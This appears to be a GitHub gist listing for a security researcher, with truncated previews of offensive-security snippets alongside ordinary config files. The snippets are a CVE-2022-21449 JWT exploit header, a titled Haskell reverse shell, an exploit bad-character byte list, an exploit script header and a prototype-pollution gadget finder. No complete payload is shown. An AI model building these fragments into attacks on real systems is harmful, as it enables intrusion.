dualfade
/ cve-2022-21449 jwt ecdsa
Last active
August 7, 2023 15:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # cve-2022-21449.py | |
| # dualfade -- | |
| # refs -- | |
| # https://bit.ly/3aVqwsC -- | |
| # https://bit.ly/3tw6z1P -- | |
| # initial jwt -- | |
| # ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \ |
dualfade
/ Ly PKGBUILD
Created
May 28, 2022 15:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ly PKGBUILD | |
| # See COPYING for license details. | |
| # notes -- | |
| # sudo systemctl disable lightdm.service | |
| # sudo systemctl enable ly.service | |
| # sudo systemctl disable getty@tty2.service | |
| pkgname=ly | |
| pkgver=89.cc5a50f |
dualfade
/ haskell reverse shell --
Last active
May 14, 2022 23:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| yain ghc haskell-hls-test-utils | |
| ghc --dynamic r.hs | |
| [0] % ll r | |
| -rwxr-xr-x 1 dualfade dualfade 34K May 5 14:47 r* | |
| [0] % file r | |
| r: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 4.4.0, BuildID[sha1]=53c20a76560c2acee16eb009b709b150bd11440c, not stripped | |
| file -> r.hs | |
| import Network.Socket hiding (send, sendTo, recv, recvFrom) |
dualfade
/ xcalc xcalc.desktop
Last active
April 28, 2022 16:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I like an old sk00l calculator -- | |
| yes; swiping the default installed galculator icon. So be it -- | |
| /usr/share/applications | |
| -rw-r--r-- 1 root root 197 Apr 28 11:57 xcalc.desktop | |
| [Desktop Entry] | |
| Name=Xcalc | |
| Comment=Perform simple and scientific calculations | |
| Keywords=xcalc |
dualfade
/ py3 quick bad chars --
Created
February 15, 2022 17:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Quick exploit bad char drop -- | |
| # pip install badchars -- | |
| # badchars -f python | sed 's/^\s*\"./\tb"\\/g' | xclipc | |
| badchars = ( | |
| b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" | |
| b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" | |
| b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" | |
| b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" | |
| b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" |
dualfade
/ signatus --
Last active
February 10, 2022 18:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # signatus_03.py -- | |
| # dualfade | |
| import sys | |
| import time | |
| import socket | |
| from struct import pack | |
| from optparse import OptionParser |
dualfade
/ fingerprint.js
Last active
March 25, 2023 18:08
— forked from nikitastupin/fingerprint.js
fingerprint.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // find javascript gadgets -- | |
| // forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec | |
| // ref => https://github.com/BlackFan/client-side-prototype-pollution | |
| // ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution | |
| // updated; @dualfade -- | |
| // start -- | |
| // check for known gadgets -- | |
| (() => { | |
| // gadgets -- |
dualfade
/ debug-events.js
Created
December 23, 2021 01:10
— forked from alessioalex/debug-events.js
intercept *.addEventListener for debugging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // http://stackoverflow.com/questions/4787698/failure-to-override-elements-addeventlistener-in-firefox | |
| (function() { | |
| Error.stackTraceLimit = Infinity; | |
| var _interfaces = Object.getOwnPropertyNames(window).filter(function(i) { | |
| return /^HTML/.test(i); | |
| }).map(function(i) { | |
| return window[i]; | |
| }); |
dualfade
/ node graphql introspection
Created
December 9, 2021 18:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ref -- | |
| // https://bit.ly/3rRPy2m | |
| // https://github.com/graphql/graphql.github.io/tree/source/src/content/graphql-js | |
| const path = require("path"); | |
| const fs = require("fs"); | |
| // const fetch = require("node-fetch"); | |
| const fetch = (...args) => import('node-fetch').then(({default: fetch}) => fetch(...args)); | |
| const { |
dualfade
/ intercept-network-requests.js
Created
December 8, 2021 14:34
— forked from benjamingr/intercept-network-requests.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function interceptNetworkRequests(ee) { | |
| const open = XMLHttpRequest.prototype.open; | |
| const send = XMLHttpRequest.prototype.send; | |
| const isRegularXHR = open.toString().indexOf('native code') !== -1; | |
| // don't hijack if already hijacked - this will mess up with frameworks like Angular with zones | |
| // we work if we load first there which we can. | |
| if (isRegularXHR) { |